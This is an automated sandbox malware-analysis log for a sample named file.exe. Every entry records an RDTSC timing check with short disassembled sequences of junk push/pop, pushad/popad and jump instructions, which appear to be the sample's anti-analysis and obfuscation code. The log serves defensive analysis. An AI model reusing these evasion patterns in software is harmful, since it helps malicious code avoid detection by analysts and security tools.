                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225323 second address: 122532A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122532A second address: 122533E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD9092ECB2Bh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12254B1 second address: 12254B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12254B6 second address: 12254BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12254BC second address: 12254C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12262E0 second address: 12262FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD9092ECB26h 0x0000000a jmp 00007FD9092ECB2Fh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12262FC second address: 1226302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226302 second address: 122631F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265CE second address: 12265D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265D2 second address: 12265E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD9092ECB28h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265E0 second address: 12265EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD908C4C6E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265EC second address: 12265F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265F0 second address: 12265F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265F4 second address: 122661E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FD9092ECB2Eh 0x00000011 jbe 00007FD9092ECB26h 0x00000017 pushad 0x00000018 popad 0x00000019 jo 00007FD9092ECB28h 0x0000001f push edi 0x00000020 pop edi 0x00000021 pushad 0x00000022 jnl 00007FD9092ECB26h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122661E second address: 1226624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226903 second address: 122691B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD9092ECB26h 0x00000008 jo 00007FD9092ECB26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FD9092ECB26h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122691B second address: 122691F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122691F second address: 1226925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226925 second address: 122692B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122692B second address: 1226931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226ED6 second address: 1226EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226EEF second address: 1226F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9092ECB34h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A795 second address: 122A79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AA10 second address: 122AA14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AA14 second address: 122AA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AA1A second address: 122AA20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AB88 second address: 122AB8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AB8C second address: 122AB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AB92 second address: 122AB9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FD908C4C6E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AB9D second address: 122ABA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12363AB second address: 12363AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236553 second address: 1236559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236559 second address: 123655D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123655D second address: 1236572 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD9092ECB2Dh 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236572 second address: 1236583 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FD908C4C6FAh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236583 second address: 1236589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236589 second address: 123658F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123681F second address: 1236823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236AF5 second address: 1236AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236AF9 second address: 1236B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jl 00007FD9092ECB26h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236B11 second address: 1236B46 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD908C4C6E6h 0x00000008 jmp 00007FD908C4C6EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FD908C4C6F6h 0x00000015 jmp 00007FD908C4C6EAh 0x0000001a jno 00007FD908C4C6E6h 0x00000020 jl 00007FD908C4C6ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236B46 second address: 1236B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235A8A second address: 1235A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E377 second address: 123E37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEC8 second address: 123DEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FD908C4C6EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEE0 second address: 123DEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEE6 second address: 123DEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEEB second address: 123DEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123FA59 second address: 123FA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123FA5D second address: 123FA71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FD9092ECB26h 0x0000000e ja 00007FD9092ECB26h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124CDFA second address: 124CE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007FD908C4C6EAh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jnp 00007FD908C4C6EAh 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124CE1A second address: 124CE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9092ECB35h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C88A second address: 124C897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FF74 second address: 124FF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FD9092ECB34h 0x0000000b jmp 00007FD9092ECB2Bh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FF9C second address: 124FFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6F4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B154 second address: 125B169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FD9092ECB2Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FABD second address: 125FAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FAC1 second address: 125FAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12661A6 second address: 12661AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12661AE second address: 12661B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12661B3 second address: 12661BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12661BB second address: 12661CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD9092ECB26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12661CA second address: 12661D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126663D second address: 1266643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266643 second address: 126665F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FD908C4C6F3h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126665F second address: 1266669 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266669 second address: 1266673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD908C4C6E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266673 second address: 1266677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12667A5 second address: 12667C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD908C4C6ECh 0x0000000e je 00007FD908C4C6EEh 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267537 second address: 126753D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126753D second address: 1267541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269126 second address: 126912A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B9AB second address: 126B9B5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD908C4C6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B9B5 second address: 126B9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B9BF second address: 126B9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B9C3 second address: 126B9C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BEF3 second address: 128BEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2D13 second address: 12A2D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD9092ECB26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2D1F second address: 12A2D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD908C4C6E6h 0x0000000a popad 0x0000000b jmp 00007FD908C4C6F8h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2D48 second address: 12A2D64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7555 second address: 12A755B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A755B second address: 12A7565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD9092ECB26h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A65F3 second address: 12A65F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A65F9 second address: 12A65FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A65FD second address: 12A6601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A68A2 second address: 12A68A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A68A8 second address: 12A68B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD908C4C6E6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6E44 second address: 12A6E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6E48 second address: 12A6E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6E54 second address: 12A6E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AB7D9 second address: 12AB7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AB7E0 second address: 12AB7E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ABA5C second address: 12ABAAB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD908C4C6ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b and edx, 63006CB1h 0x00000011 push dword ptr [ebp+1244A896h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FD908C4C6E8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 sub edx, dword ptr [ebp+122D35ACh] 0x00000037 push 28CE0998h 0x0000003c ja 00007FD908C4C6F0h 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD27C second address: 12AD28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD9092ECB2Ah 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD28F second address: 12AD2AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD908C4C6F4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2AE second address: 12AD2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AED99 second address: 12AED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AED9F second address: 12AEDA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502D5 second address: 50502DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, B054h 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502DE second address: 5050304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 jmp 00007FD9092ECB34h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050304 second address: 5050309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504010F second address: 5040115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
